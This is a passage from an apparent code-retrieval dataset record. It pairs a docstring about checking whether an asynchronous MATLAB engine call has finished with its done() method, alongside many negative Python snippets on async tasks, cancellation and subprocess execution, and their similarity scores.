test_reactor_stop_unblocks_EventualResult(self):\n program = \"\"\"\\\nimport os, threading, signal, time, sys\n\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet import reactor\n\nimport crochet\ncrochet.setup()\n\[email protected]_in_reactor\ndef run():\n reactor.callLater(0.1, reactor.stop)\n return Deferred()\n\ner = run()\ntry:\n er.wait(timeout=10)\nexcept crochet.ReactorStopped:\n sys.exit(23)\n\"\"\"\n process = subprocess.Popen([sys.executable, \"-c\", program],\n cwd=crochet_directory)\n self.assertEqual(process.wait(), 23)", "def terminal_condition(self) -> 'outputs.GoogleCloudRunV2ConditionResponse':\n return pulumi.get(self, \"terminal_condition\")", "def cancelok(foo):\n @functools.wraps(foo)\n async def wrapper(*args, **kwargs):\n try:\n return await foo(*args, **kwargs)\n except asyncio.CancelledError:\n return\n return wrapper", "def _thread_check_abort_event(self):\n self._require_controller_modes('thread_initialized')\n return self.thread.check_abort_event()", "def EnableAsyncConfSlavePortStatusDelete(self):\n\t\treturn self._get_attribute('enableAsyncConfSlavePortStatusDelete')", "async def test_job_canceled(my_job):\n\n # Set up callback to get notifications when job state changes.\n job = None\n\n def on_job_update(_job):\n \"\"\"The callback to update `job`.\"\"\"\n nonlocal job\n job = _job\n\n if job.state in ['WORKING', 'DONE', 'ERROR']:\n canceled = my_job.job_manager_class.cancel(job.id)\n assert not canceled, (\n f'Uncancelable job is canceled in the `{job.state}` state!')\n\n my_job.set_on_update(on_job_update)\n\n # Submit a job that fails.\n await my_job.job(mustfail=True)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'ERROR', f'Failed job has wrong state `{job.state}`!'\n\n # Submit a job that succeeds.\n await my_job.job(mustfail=False)\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check a state of the job.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'", "def is_aborted(self, **kwargs):\n task_id = kwargs.get('task_id', self.request.id)\n result = self.AsyncResult(task_id)\n if not isinstance(result, AbortableAsyncResult):\n return False\n return result.is_aborted()", "def test_cancel_sync_handle_call_during_execution(serve_instance):\n running_signal_actor = SignalActor.remote()\n 
cancelled_signal_actor = SignalActor.remote()\n\n @serve.deployment\n class Ingress:\n async def __call__(self, *args):\n await running_signal_actor.send.remote()\n await send_signal_on_cancellation(cancelled_signal_actor)\n\n h = serve.run(Ingress.bind()).options(use_new_handle_api=True)\n\n # Send a request and wait for it to start executing.\n r = h.remote()\n ray.get(running_signal_actor.wait.remote(), timeout=10)\n\n # Cancel it and verify that it is cancelled via signal.\n r.cancel()\n ray.get(cancelled_signal_actor.wait.remote(), timeout=10)\n\n with pytest.raises(ray.exceptions.TaskCancelledError):\n r.result()", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "async def execute(self):\n eq = False\n for i in range(self._iterations):\n r = await self._execute()\n if r == self._expected_return:\n eq = True\n await asyncio.sleep_ms(self._iter_delay)\n return eq if eq is True else r", "async def wait(self):\n if self.poll() is None:\n await wait_child_exiting(self)\n self._proc.wait()\n else:\n await _core.checkpoint()\n return self.returncode", "def cancel(self):\n self._logger.warning(\"Comparison run being cancelled.\")\n self._msg_logger.warning(run_analysis_view._text[\"log10\"])\n if hasattr(self, \"_off_thread\"):\n self._off_thread.cancel()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()" ]
[ "0.57483846", "0.5747091", "0.5745746", "0.5590403", "0.55467594", "0.55077934", "0.55016315", "0.5491056", "0.5442433", "0.5399497", "0.5271981", "0.5269121", "0.5266887", "0.5225791", "0.5185286", "0.5151515", "0.51362634", "0.5117819", "0.51172787", "0.50527465", "0.50269765", "0.49973252", "0.49814463", "0.49633318", "0.4950942", "0.4946667", "0.49385345", "0.49272752", "0.49211815", "0.48881978", "0.4880757", "0.4878895", "0.48717937", "0.48681948", "0.48548475", "0.48448855", "0.48357973", "0.48033077", "0.47974798", "0.47867578", "0.47867578", "0.47867578", "0.47867578", "0.4769865", "0.47693026", "0.47629997", "0.4758259", "0.47497755", "0.4746553", "0.47354287", "0.4720956", "0.47197285", "0.4718703", "0.47090772", "0.4708806", "0.4708806", "0.4708806", "0.47077197", "0.4694512", "0.46834463", "0.46833733", "0.46805838", "0.46788132", "0.4668407", "0.46570903", "0.46440527", "0.46404812", "0.46353808", "0.46268088", "0.4626343", "0.46168527", "0.46150848", "0.46077558", "0.46038023", "0.45977476", "0.45906678", "0.45784017", "0.4575565", "0.45731625", "0.45560032", "0.45550638", "0.45543268", "0.4534234", "0.45303383", "0.45243713", "0.45161754", "0.4507505", "0.44916636", "0.44910002", "0.4487735", "0.44864622", "0.44708556", "0.4467856", "0.44666004", "0.4465725", "0.44647697", "0.44618693", "0.44617087", "0.44617087", "0.44617087" ]
0.6059455
0
Obtain the completion status of the asynchronous invocation of a MATLAB command. Returns bool: True if the execution is finished; False otherwise. It returns True even if there is an error generated from the MATLAB statement or it is cancelled. Raises RejectedExecutionError: an error occurs if the engine is terminated.
def done(self): self.__validate_engine() return pythonengine.isDoneFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def _execute(self):\n f = os.popen(self._com)\n if self._exec_time > 0:\n await asyncio.sleep_ms(self._exec_time)\n try:\n r = f.read()\n print(r)\n if self._expected_return is not None:\n if r == self._expected_return:\n return True\n return r\n else:\n return r\n except Exception as e:\n raise e\n finally:\n f.close()", "def _execute(self) -> Any:\n result = self.func(*self.args, **self.kwargs)\n if asyncio.iscoroutine(result):\n loop = asyncio.new_event_loop()\n coro_result = loop.run_until_complete(result)\n return coro_result\n return result", "async def _wait_execute(self, address, command, args, kw):\n conn = await self.acquire(command, args)\n try:\n return (await conn.execute(command, *args, **kw))\n finally:\n self.release(conn)", "def execute_success(self, *args, **kwargs):\n return 0, self.shell_output, None", "def succeeded(self):\n output = self.__call__()\n if output.succeeded:\n return output or True\n return False", "async def execute(self):\n eq = False\n for i in range(self._iterations):\n r = await self._execute()\n if r == self._expected_return:\n eq = True\n await asyncio.sleep_ms(self._iter_delay)\n return eq if eq is True else r", "def _await_operation_result(self):\n response = ReadMessage(self.connection.receive_message())\n result = response.read_uint8()\n self._assert_success(result)", "def executeCommand(commandtoexecute):\n try:\n _output = commands.getstatusoutput(commandtoexecute)\n except Exception as er:\n print \"not able to execute command\"\n return False\n return _output", "def result(self, timeout=None): \n self.__validate_engine()\n \n if self._retrieved:\n return self._result\n\n \"\"\"\n Following code is used to poll the Ctrl+C every second from keyboard in\n order to cancel a MATLAB function.\n \"\"\"\n\n try:\n result_ready = self.wait(timeout, pythonengine.waitForFEval)\n\n if not result_ready:\n raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout'))\n\n self._result = pythonengine.getFEvalResult(self._future,self._nargout, None, out=self._out, err=self._err)\n self._retrieved = True\n return self._result\n\n except KeyboardInterrupt:\n self.cancel()\n if self.cancelled():\n print(pythonengine.getMessage('MatlabFunctionCancelled'))\n except:\n raise", "def _execute(self, cmd):\r\n stdout, stderr, return_code = self._remote_client.run_remote_cmd(cmd)\r\n if return_code:\r\n raise exceptions.ArgusError(\r\n \"Command {command!r} failed with \"\r\n \"return code {return_code!r}\"\r\n .format(command=cmd,\r\n return_code=return_code))\r\n return stdout, stderr", "def _retrieve_result(self, out):\n try:\n result = self.parallel._backend.retrieve_result_callback(out)\n outcome = dict(status=TASK_DONE, result=result)\n except BaseException as e:\n # Avoid keeping references to parallel in the error.\n e.__traceback__ = None\n outcome = dict(result=e, status=TASK_ERROR)\n\n self._register_outcome(outcome)\n return outcome['status'] != TASK_ERROR", "def __try_command(cmd, description):\n try:\n out = subprocess.check_output(cmd, stderr=subprocess.STDOUT);\n return (True, out.decode(\"utf-8\")) # success\n except subprocess.CalledProcessError as e:\n print(\"Error while {:s}, return code is non-zero ({:d})\".format(description, e.returncode))\n print(\"Command: {:s}\".format(\" \".join(e.cmd)))\n if e.output:\n print(\"Output: {:s}\".format(e.output.decode(\"utf-8\").strip()))\n\n return (False, None) # error", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return 
True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "def execute_task(self, filename):\n stdin, stdout, stderr = self.ssh.exec_command(open(filename).read())\n if stdout.channel.recv_exit_status() == 0:\n return True, stdout.read().strip(), stderr.read().strip()\n else:\n return False, stdout.read().strip(), stderr.read().strip()", "def wait_for_execution_completion(self, execution_id, document_name=None):\n # Fetch ssm execution status\n status = self._get_execution_status(execution_id, document_name)\n\n # Wait for execution to be completed\n while status == 'InProgress' or status == 'Pending' or status == 'Cancelling' or status == 'Waiting':\n time.sleep(constants.sleep_time_secs)\n status = self._get_execution_status(execution_id, document_name)\n return status", "def _checkCommandStatus(self, lastCommand=False):\n p = self.spawnProc\n p.sendline('echo $?')\n regex = re.compile('^[0-9]+',re.M)\n p.expect(regex, 2)\n msg = '_checkCommandStatus : Execution of command FAILED'\n \tif lastCommand:\n \t msg = '_checkCommandStatus :Execution of command : \"%s\" FAILED' %lastCommand\n if p.after != '0' and p.after != '99':\n raise AssertionError(msg)", "def __execute(self, command):\n if not self.status:\n return 0\n\n stdin, stdout, stderr = self.__sshClientObj.exec_command(command)\n\n result = stderr.readlines()\n if len(result) > 1:\n return 0\n\n result = stdout.readlines()\n if len(result) > 1:\n return result[0][:-1]\n\n return 1", "def finished(self):\n if self._complete:\n raise ValueError('The operation has completed.')\n\n operation_name = (\n 'operations/%s/locations/%s/operations/%d' %\n (self._instance.name, self.location_id, self.op_id))\n request_pb = operations_pb2.GetOperationRequest(name=operation_name)\n # We expect a `google.longrunning.operations_pb2.Operation`.\n operation_pb = self._instance._client._operations_stub.GetOperation(\n request_pb, self._instance._client.timeout_seconds)\n\n if operation_pb.done:\n self._complete = True\n return True\n else:\n return False", "async def async_call(self, args=None, timeout=None):\n if args is None:\n args = []\n\n # Executing command with Tornado subprocess is possible only in main thread\n if threading.main_thread().ident != threading.get_ident():\n return self.call(args=args, timeout=timeout)\n\n all_args = [self.CMD if self.CMD is not None else cfg['tools.%s.cmd' % self.NAME]]\n all_args.extend(self.COMMON_ARGS)\n all_args.extend(args)\n cmd = ' '.join(all_args),\n log.debug('Executing: %s', cmd)\n\n if self._cancelled:\n raise Exception('Task was cancelled')\n task = process.Subprocess(all_args, stderr=process.Subprocess.STREAM, stdout=process.Subprocess.STREAM)\n self.proc = task.proc\n\n coroutine = gen.multi([task.wait_for_exit(raise_error=False),\n task.stdout.read_until_close(),\n task.stderr.read_until_close()])\n\n if not timeout:\n return_code, stdout, stderr = await coroutine\n else:\n try:\n return_code, stdout, stderr = await gen.with_timeout(timedelta(seconds=timeout), coroutine)\n except gen.TimeoutError as exception:\n log.exception(\"Command %s timed out after %s while executing %s\", self.NAME, timeout, cmd)\n task.proc.kill()\n raise exception\n\n self.proc = None\n\n if return_code != 0:\n log.warning(\"Command '%s' failed wit exit code: %s\", cmd, return_code)\n log.debug(\"Command '%s':\\nSTDOUT:\\n%s\\nSTDERR:\\n%s\", cmd, stdout, stderr)\n if self.RAISE_ERROR:\n raise subprocess.CalledProcessError(return_code, cmd)\n\n 
return self.parser.parse(stdout.decode('utf-8'), stderr.decode('utf-8'))", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "def _execute(self, command):\n _, stdout, stderr = self.ssh_client.exec_command(command)\n exit_code = stdout.channel.recv_exit_status()\n stdout = stdout.read().decode().strip()\n stderr = stderr.read().decode().strip()\n\n return exit_code, stdout, stderr", "def _exec_cmd(self, cmd, ignore_status=False, timeout=DEFAULT_ADB_TIMEOUT):\n result = job.run(cmd, ignore_status=True, timeout=timeout)\n ret, out, err = result.exit_status, result.stdout, result.stderr\n\n logging.debug(\"cmd: %s, stdout: %s, stderr: %s, ret: %s\", cmd, out,\n err, ret)\n if \"Result: Parcel\" in out:\n return parsing_parcel_output(out)\n if ignore_status:\n return out or err\n if ret == 1 and DEVICE_NOT_FOUND_REGEX.match(err):\n raise AdbError(cmd=cmd, stdout=out, stderr=err, ret_code=ret)\n else:\n return out", "def get(self):\n if not self.finished():\n self.wait()\n return self._result", "def evaluateCommand(self, cmd):\n if cmd.rc != 0:\n return FAILURE\n if self.errors:\n\t if halt_on_lintian_error:\n\t return FAILURE\n\t else:\n\t\treturn WARNINGS\n if self.warnings:\n return WARNINGS\n return SUCCESS", "async def wait(self):\n if self.poll() is None:\n await wait_child_exiting(self)\n self._proc.wait()\n else:\n await _core.checkpoint()\n return self.returncode", "def isfailure(self):\n\n return self.proc.returncode != 0", "def exec_command(self, cmd):\n err_buf = (ctypes.c_char * self.MAX_BUF_SIZE)()\n res = self._dll.JLINKARM_ExecCommand(cmd.encode(), err_buf, self.MAX_BUF_SIZE)\n err_buf = ctypes.string_at(err_buf).decode()\n\n if len(err_buf) > 0:\n # This is how they check for error in the documentation, so check\n # this way as well.\n raise errors.JLinkException(err_buf.strip())\n\n return res", "def execute(cmd, path):\n oldPath = os.getcwd()\n os.chdir(path)\n\n exitcode, output = subprocess.getstatusoutput(cmd)\n\n os.chdir(oldPath)\n\n ok = not exitcode\n\n return ok, output", "def done(self) -> bool:\n\n if len(self.required_tasks) == 0:\n return True\n\n task_query = self.storage_socket.get_procedures(\n id=list(self.required_tasks.values()), include=[\"status\", \"error\"]\n )\n\n status_values = set(x[\"status\"] for x in task_query[\"data\"])\n if status_values == {\"COMPLETE\"}:\n return True\n\n elif \"ERROR\" in status_values:\n for x in task_query[\"data\"]:\n if x[\"status\"] != \"ERROR\":\n continue\n\n self.logger.debug(\"Error in service compute as follows:\")\n tasks = self.storage_socket.get_queue()[\"data\"]\n for x in tasks:\n if \"error\" not in x:\n continue\n\n 
self.logger.debug(x[\"error\"][\"error_message\"])\n\n raise KeyError(\"All tasks did not execute successfully.\")\n else:\n return False", "async def checked_run(cmd, env=None):\n\n # Start the subprocess.\n logging.info('Running: %s', await expand_cmd_str(cmd))\n with logged_timer('{} finished'.format(get_cmd_name(cmd))):\n p = await asyncio.create_subprocess_exec(\n *cmd, env=env,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.STDOUT)\n\n # Stream output from the process stdout.\n lines = []\n while True:\n line = await p.stdout.readline()\n if not line:\n break\n line = line.decode()[:-1]\n lines.append(line)\n logging.info(line)\n\n # Wait for the process to finish, check it was successful & build stdout.\n await p.wait()\n output = '\\n'.join(lines)[:-1]\n if p.returncode:\n raise RuntimeError('Return code {} from process: {}\\n{}'.format(\n p.returncode, await expand_cmd_str(cmd), output))\n\n return output", "def cmd_wait(con, run_cmd):\n # May take up to 5 minutes\n sleep(5)\n ret = False\n for _ in range(25):\n try:\n result = con.run(run_cmd, hide=True)\n if result.return_code == 0:\n ret = True\n break\n except (ConnectionError, NoValidConnectionsError):\n sleep(10)\n\n return ret", "def parallelize_isfunctionfinished(parallelizehandle):\r\n\r\n \r\n try:\r\n if parallelize_info_dict[parallelizehandle]['runninglist']:\r\n return False\r\n else:\r\n return True\r\n except KeyError:\r\n raise ParallelizeError(\"Cannot get status for the parallel execution of a non-existent handle:\"+str(parallelizehandle))", "def is_task_done(self):\r\n is_task_done = c_bool32()\r\n\r\n cfunc = lib_importer.windll.DAQmxIsTaskDone\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [\r\n lib_importer.task_handle, ctypes.POINTER(c_bool32)]\r\n\r\n error_code = cfunc(\r\n self._handle, ctypes.byref(is_task_done))\r\n check_for_error(error_code)\r\n\r\n return is_task_done.value", "def result(self):\n with self.__lock:\n assert(self.__complete)\n return self.__result", "def poll(self):\n if self._worker is None:\n self.returncode = None\n return self.returncode\n elif self._worker.is_alive():\n self.returncode = None\n return self.returncode\n else:\n self.returncode = self._worker.state.return_value\n return self.returncode", "def _query_state_code(command):\n _LOGGER.info('Running state command: %s', command)\n return subprocess.call(command, shell=True) == 0", "def execute(self, *args, **kwargs):\n\n if 'timeout' not in kwargs:\n kwargs['timeout'] = self.worker.get('timeout', 60)\n\n self.logger.info(\"Running command %s\", args)\n result = sp.check_call(args, **kwargs)\n self.logger.info(\"Command Finished\")\n return result", "def execute_command_async(self, command):\n raise NotImplementedError", "def _exec_command(command):\n\n log(\"Run command for '%s'\" % command)\n p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n (output, err) = p.communicate()\n p_status = p.wait()\n return p_status, output", "def is_async(self) -> bool:", "def execute(self, condition=None, timeout=90):\n if not self.stopped:\n if timeout:\n def timeout_func():\n try:\n raise Exception('Async operation timed out after {} seconds'.format(timeout))\n except:\n self.stop(failure=sys.exc_info())\n\n self.io_loop.add_timeout(time.time() + timeout, timeout_func)\n while True:\n self.running = True\n with NullContext():\n # Wipe out the StackContext that was established in\n # self.run() so that all callbacks executed inside the\n # IOLoop 
will re-run it.\n self.io_loop.start()\n if (self.failure is not None or\n condition is None or condition()):\n break\n assert self.stopped\n self.stopped = False\n if self.failure is not None:\n raise self.failure[0], self.failure[1], self.failure[2]\n result = self.return_value\n self.return_value = None\n return result", "def status(self):\n with self.__lock:\n assert(self.__complete)\n return self.__status", "def exec_command_string(command_str):\n print(command_str)\n (status, result) = getstatusoutput(command_str)\n return status, result", "async def _run_cmd(self, cmd, timeout=5):\n try:\n self._flush_buffer()\n self.pexpect_child.sendline(cmd)\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n stdout = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else \"\"\n self.pexpect_child.sendline(\"echo $?\")\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n exit_status = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else -1\n try:\n exit_status = int(exit_status)\n except ValueError:\n exit_status = -1\n return exit_status, stdout\n except Exception as e:\n self.applog.exception(\"Exception occured --> _run_command\", exc_info=e)\n raise", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def _subprocess(cmd):\n\n log.debug('Running: \"%s\"', \" \".join(cmd))\n try:\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n ret = salt.utils.stringutils.to_unicode(proc.communicate()[0]).strip()\n retcode = proc.wait()\n\n if ret:\n return ret\n elif retcode != 1:\n return True\n else:\n return False\n except OSError as err:\n log.error(err)\n return False", "def _exec_cmd(cmd, stdout=None, stderr=None):\n rc = 0\n kwargs = {}\n if stdout is not None:\n kwargs[\"stdout\"] = stdout\n if stderr is not None:\n kwargs[\"stderr\"] = stderr\n try:\n subprocess.check_call(cmd, **kwargs)\n except CalledProcessError as e:\n LOG.error(\"[return code: %s] %s\", e.returncode, e)\n rc = e.returncode\n return rc", "def has_finished(self):\n return hasattr(self, '_result') or hasattr(self, '_result_exc')", "def async_check(word):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(async_cli(word))", "def _wait_for_results(self) -> RemoteCallableResult:\n if (\n self.subscriber is None or\n self.started is None or\n self.process is None\n ):\n raise dbt.exceptions.InternalException(\n '_wait_for_results() called before handle()'\n )\n\n try:\n msg = self.subscriber.dispatch_until_exit(\n started=self.started,\n timeout=self.timeout,\n )\n except dbt.exceptions.Exception as exc:\n raise dbt_error(exc)\n except Exception as exc:\n raise server_error(exc)\n if isinstance(msg, QueueErrorMessage):\n raise RPCException.from_error(msg.error)\n elif isinstance(msg, QueueTimeoutMessage):\n if not self._single_threaded:\n self.process.terminate()\n 
raise timeout_error(self.timeout)\n elif isinstance(msg, QueueResultMessage):\n return msg.result\n else:\n raise dbt.exceptions.InternalException(\n 'Invalid message type {} (result={})'.format(msg)\n )", "def status(self):\n if not self._last_command:\n return None\n return self._last_command.status()", "def run(self):\n try:\n self.cmd_output = \\\n subprocess.run(self.cmd, \\\n stdout=subprocess.PIPE, \\\n stderr=subprocess.PIPE, \\\n shell=True, env=ENVS, \\\n check=True).stdout.decode('utf-8')\n return True\n except subprocess.CalledProcessError as e:\n self.cmd_output = e.stderr.decode('utf-8')\n return False", "def execute(self, command, *args, **kw):\n conn, address = self.get_connection(command, args)\n if conn is not None:\n fut = conn.execute(command, *args, **kw)\n return self._check_result(fut, command, args, kw)\n else:\n coro = self._wait_execute(address, command, args, kw)\n return self._check_result(coro, command, args, kw)", "def wait_for_func_status(self, result):\n try:\n for res in self:\n if result == res:\n return True\n\n except self.timeout_exc_cls:\n log.error(\n f\"({self.func.__name__}) return incorrect status after timeout\"\n )\n return False", "def asyncgetresult(self,server_,port_,token_): # 3\n res,resargs = self.__obj.asyncgetresult(server_,port_,token_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n _respavailable_return_value,_resp_return_value,_trm_return_value = resargs\n _trm_return_value = rescode(_trm_return_value)\n _resp_return_value = rescode(_resp_return_value)\n return _respavailable_return_value,_resp_return_value,_trm_return_value", "def check_output(command):\n process = Popen(command, shell=True, stdout=PIPE)\n output, err = process.communicate()\n if process.returncode == 0: # success\n return output\n else:\n raise RuntimeError(\"Command {0} running unsuccessfully\".format(command))", "def ended(self):\n return self.succeeded() or self.failed()", "def is_finished(self, remotely=True, ssh='ssh'):\n from subprocess import check_output, CalledProcessError\n from os.path import join\n\n remotefile = self.resultfile\n\n ssh = getattr(self, 'ssh', ssh)\n\n if remotely:\n remotefile = join(self.remote_directory, remotefile)\n else:\n remotefile = join(self.local_directory, remotefile)\n try:\n if not remotely or self.no_ssh:\n check_output([\"ls\", remotefile])\n else:\n check_output([ssh, self.url, \"ls\", remotefile])\n return True\n except CalledProcessError:\n return False", "def raw_check_complete(self):\n check_complete_response = self._raw_execute(\"status\", {\"job_id\": self.job_id})\n return check_complete_response", "def _check_step_completed(self, i):\n\n module, _ = self._get_command_config(i)\n status = self._get_status_obj()\n submitted = self._check_jobs_submitted(status, module)\n if not submitted:\n return_code = 1\n else:\n return_code = self._get_module_return_code(status, module)\n\n return return_code", "def _check_if_completed(self):\n if self.completed:\n self._result = self._complete()\n elif self.timed_out:\n logger.debug(f\"Use case {type(self.use_case).__name__} \"\n f\"timed out after taking more than \"\n f\"{self.use_case.timeout} seconds.\")\n self._result = self._complete(timed_out=True)\n self._execution_counter += 1", "def os_exec(self, cmd, **kwargs):\n pdb.set_trace()\n try:\n retv = os.system(cmd)\n print(\"Got retv: {}\".format(retv))\n if retv != 0:\n print(\"\\t{} |{}| Got incorrect retv {}!\".format(Timer.UNKN,self.tinfo['name'], retv))\n return\n else:\n 
print(\"\\t{} |{}| Executed system command successfully.\".format(Timer.OK, self.tinfo['name']))\n return True\n\n except PermissionError as e:\n print(\"{} Permission error in os_exec.\".format(Timer.FAIL, e))\n return False\n except Exception as e:\n print(\"{} Caught exception in os_exec: {}\".format(Timer.FAIL, e))\n return False", "def wait_process_completion(remote_command_executor, pid):\n logging.info(\"Waiting for performance test to complete\")\n command = f\"\"\"\n ps --pid {pid} > /dev/null\n [ \"$?\" -ne 0 ] && echo \"COMPLETE\" || echo \"RUNNING\"\n \"\"\"\n result = remote_command_executor.run_remote_command(command)\n if result.stdout == \"RUNNING\":\n raise Exception(\"The process is still running\")\n else:\n return result.stdout.strip()", "def returncode(self) -> Optional[Union[int, str]]:\n return self.proc.poll() # type: ignore", "def run(self, cmd, timeout=30, exitcode=True):\n result = False\n self.write(cmd)\n stdout = self.stdout_read(timeout)\n\n if exitcode:\n self.write(\"echo $?\".format(cmd))\n rc = self.stdout_read(timeout)\n if re.search(r\"\\r\\n0\\r\\n\", rc, re.MULTILINE):\n result = True\n elif stdout is not None and stdout != \"\":\n result = True\n return result, stdout", "def getResult(self):\n return self.ok", "def execute_cmd(cmd, cwd=None, timeout=5):\n p = subprocess.Popen(cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n p.wait(timeout=timeout)\n except subprocess.TimeoutExpired:\n return None\n else:\n stdout, stderr = p.stdout.read(), p.stderr.read()\n stdout, stderr = stdout.decode('utf-8', errors='ignore'), stderr.decode('utf-8', errors='ignore')\n if p.returncode:\n raise ExecuteError('Error running command {}: The error code {} has returned. Stderr: {}'.format(\n ' '.join(cmd), p.returncode, stderr\n ))\n else:\n return stdout, stderr", "def get(self, retry_on_failure=True):\n done = threading.Event()\n\n api.cancel_callbacks.add(done.set)\n self.on_result(lambda _result: done.set())\n done.wait()\n api.cancel_callbacks.discard(done.set)\n\n if api.has_cancel_request():\n if self._result is self._NOT_SET:\n self.result = api.ExecutionCancelled()\n raise self.result\n\n ctx = self.task.workflow_context\n if not ctx.internal.graph_mode:\n ctx.internal.task_graph.remove_task(self.task)\n\n if self.task.get_state() in (TASK_FAILED, TASK_RESCHEDULED):\n handler_result = self.task.handle_task_terminated()\n if handler_result.retried_task and retry_on_failure:\n handler_result.retried_task.apply_async()\n return handler_result.retried_task.async_result.get()\n else:\n raise self.result\n return self._result", "async def execute_system(self):\n return True", "def execute(self, *args, **kwargs):\n ret = self.method(*args, **kwargs)\n if isinstance(ret, asyncio.Future) or inspect.isgenerator(ret):\n # In that case,\n # run the asyncio coroutine in a dedicated event loop\n # of the process pool executure\n\n @asyncio.coroutine\n def routine(method, future):\n ret = yield from method\n future.set_result(ret)\n\n future = asyncio.Future()\n old_loop = asyncio.get_event_loop()\n try:\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.Task(routine(ret, future)))\n ret = future.result()\n finally:\n asyncio.set_event_loop(old_loop)\n loop.close()\n\n return ret", "async def checked_run(*cmd):\n\n # Start the subprocess.\n logging.info('Running: %s', expand_cmd_str(cmd))\n with logged_timer('{} finished'.format(get_cmd_name(cmd))):\n p = await asyncio.create_subprocess_exec(\n *cmd, 
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.STDOUT)\n\n # Stream output from the process stdout.\n chunks = []\n while True:\n chunk = await p.stdout.read(16 * 1024)\n if not chunk:\n break\n chunks.append(chunk)\n\n # Wait for the process to finish, check it was successful & build stdout.\n await p.wait()\n stdout = b''.join(chunks).decode()[:-1]\n if p.returncode:\n raise RuntimeError('Return code {} from process: {}\\n{}'.format(\n p.returncode, expand_cmd_str(cmd), stdout))\n\n return stdout", "def get_result(self):\n if not self._complete.is_set():\n logger.warning(\"Aborting attempt to retrieve result from a LongRunningTask that is \"\n \"still running\")\n return None\n if self.err:\n logger.debug(\"Error caught in thread\")\n self._config.set_cursor_default(widget=self._widget)\n raise self.err[1].with_traceback(self.err[2])\n\n logger.debug(\"Getting result from thread\")\n retval = self._queue.get()\n logger.debug(\"Got result from thread\")\n self._config.set_cursor_default(widget=self._widget)\n return retval", "def IsCompleted(self) -> bool:", "def IsCompleted(self) -> bool:", "def IsCompleted(self) -> bool:", "def get_completionStatus(self):\n val = self.resource.get_cdmi_sys_meta().get(\"cdmi_completionStatus\",\n \"Complete\")\n return val", "def run_cmd(cls, cmd):\n cmd_rc = False\n cmd_result = b'' # Stores bytes\n\n if cmd == \"\" or cmd is None:\n cmd_rc = False\n else:\n # shell=True means cmd param contains a regular cmd string\n shell = shl.Popen(cmd, shell=True,\n stdin=shl.PIPE, stdout=shl.PIPE, stderr=shl.STDOUT)\n cmd_result, _ = shell.communicate()\n if 'failure'.encode('utf-8') in cmd_result or 